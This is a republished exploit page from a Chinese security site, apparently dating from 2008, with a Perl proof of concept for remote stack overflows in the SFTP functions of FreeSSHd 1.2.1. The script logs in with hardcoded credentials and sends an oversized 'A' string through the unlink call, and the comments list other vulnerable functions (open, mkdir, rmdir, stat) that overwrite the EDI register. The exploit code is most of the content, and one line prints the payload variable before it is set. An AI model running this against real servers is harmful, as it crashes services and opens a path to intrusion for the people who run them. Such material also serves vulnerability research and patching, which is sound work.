首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exploits FreeSSHd Multiple Remote Stack Overflow Vulnerabilities
来源:www.bmgsec.com.au 作者:r0ut3r 发布时间:2008-12-24  

# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities.
#
# Version : 1.2.1
# Advisory: http://www.bmgsec.com.au/advisory/42/
#
# Discovered & written by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# After Jeremy Brown reported similar buffer overflow vulnerabilities in
# FreeSSHd I forgot about it, and stopped my research on the vulnerabilities.
# Anyway just now I noticed that other vulnerable functions had not been
# reported. So below is a small list, and a small proof of concept.
#
# Note: All below functions overwrite EDI register.
# open (edi)
# unlink (edi)
# mkdir (edi)
# rmdir (edi)
# stat (edi)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

print $payload;
my $payload = "A" x 5000;

my $sftp = $ssh2->sftp();
$sftp->unlink($payload);

print "[+] Sent";
$ssh2->disconnect;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FreeSSHD 1.2.1 (Post Auth) Rem
·Google Chrome Browser (ChromeH
·Getleft 1.2 Remote Buffer Over
·Oracle Pwnage Part 6 from DBA
·CMS NetCat 3.12 (password_reco
·BulletProof FTP Client 2.63 Lo
·RoundCube Webmail <= 0.2b Remo
·Joomla Component 5starhotels (
·CMS NetCat 3.12 (password_reco
·PHP-Fusion <= 7.0.2 Remote Bli
·PGP Desktop 9.0.6 (PGPwded.sys
·Acoustica Mixcraft <= 4.2 Univ
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved